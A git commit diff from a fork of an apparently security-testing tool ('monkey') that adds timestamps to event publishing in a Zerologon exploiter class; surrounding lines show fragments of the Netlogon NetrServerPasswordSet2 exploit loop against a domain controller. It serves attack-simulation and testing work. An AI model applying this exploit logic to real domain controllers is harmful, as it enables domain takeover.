forked from p15670423/monkey
Agent: Add timestamps to publish calls
This commit is contained in:
parent
8eb3c94a94
commit
88d2bf7140
|
@ -187,19 +187,20 @@ class ZerologonExploiter(HostExploiter):
|
|||
|
||||
def _send_exploit_rpc_login_requests(self, rpc_con) -> bool:
|
||||
for _ in interruptible_iter(range(0, self.MAX_ATTEMPTS), self.interrupt):
|
||||
exploit_attempt_result = self.try_exploit_attempt(rpc_con)
|
||||
exploit_attempt_result, timestamp = self.try_exploit_attempt(rpc_con)
|
||||
|
||||
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result)
|
||||
is_exploited = self.assess_exploit_attempt_result(exploit_attempt_result, timestamp)
|
||||
if is_exploited:
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
def try_exploit_attempt(self, rpc_con) -> Optional[object]:
|
||||
def try_exploit_attempt(self, rpc_con) -> Tuple[Optional[object], float]:
|
||||
error_message = ""
|
||||
timestamp = time()
|
||||
try:
|
||||
exploit_attempt_result = self.attempt_exploit(rpc_con)
|
||||
return exploit_attempt_result
|
||||
return exploit_attempt_result, timestamp
|
||||
except nrpc.DCERPCSessionError as err:
|
||||
# Failure should be due to a STATUS_ACCESS_DENIED error.
|
||||
# Otherwise, the attack is probably not working.
|
||||
|
@ -210,12 +211,9 @@ class ZerologonExploiter(HostExploiter):
|
|||
error_message = f"Unexpected error: {err}"
|
||||
logger.info(error_message)
|
||||
|
||||
self._publish_exploitation_event(
|
||||
success=False,
|
||||
error_message=error_message,
|
||||
)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
|
||||
return None
|
||||
return None, timestamp
|
||||
|
||||
def attempt_exploit(self, rpc_con: rpcrt.DCERPC_v5) -> object:
|
||||
request = nrpc.NetrServerPasswordSet2()
|
||||
|
@ -236,25 +234,24 @@ class ZerologonExploiter(HostExploiter):
|
|||
request["SecureChannelType"] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
|
||||
request["Authenticator"] = authenticator
|
||||
|
||||
def assess_exploit_attempt_result(self, exploit_attempt_result) -> bool:
|
||||
def assess_exploit_attempt_result(self, exploit_attempt_result, timestamp: float) -> bool:
|
||||
if exploit_attempt_result:
|
||||
if exploit_attempt_result["ErrorCode"] == 0:
|
||||
self.report_login_attempt(result=True, user=self.dc_name)
|
||||
_exploited = True
|
||||
logger.info("Exploit complete!")
|
||||
|
||||
self._publish_exploitation_event(success=True)
|
||||
self._publish_exploitation_event(timestamp, True)
|
||||
else:
|
||||
self.report_login_attempt(result=False, user=self.dc_name)
|
||||
_exploited = False
|
||||
error_message = f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
|
||||
error_message = (
|
||||
f"Non-zero return code: {exploit_attempt_result['ErrorCode']}."
|
||||
"Something went wrong."
|
||||
)
|
||||
logger.info(error_message)
|
||||
|
||||
self._publish_exploitation_event(
|
||||
success=False,
|
||||
error_message=error_message,
|
||||
)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
return _exploited
|
||||
|
||||
return False
|
||||
|
|
Loading…
Reference in New Issue